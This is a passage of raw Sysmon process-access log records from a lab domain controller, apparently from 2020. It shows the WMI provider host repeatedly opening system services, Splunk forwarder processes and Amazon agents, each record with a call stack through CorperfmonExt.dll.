13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006050Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006049Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006048Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006047Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006046Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006045Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006044Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006043Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006042Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006041Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006040Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006039Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006038Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006037Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006036Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006035Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006034Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006033Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006032Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006031Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006030Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006029Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006028Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.234{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006027Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 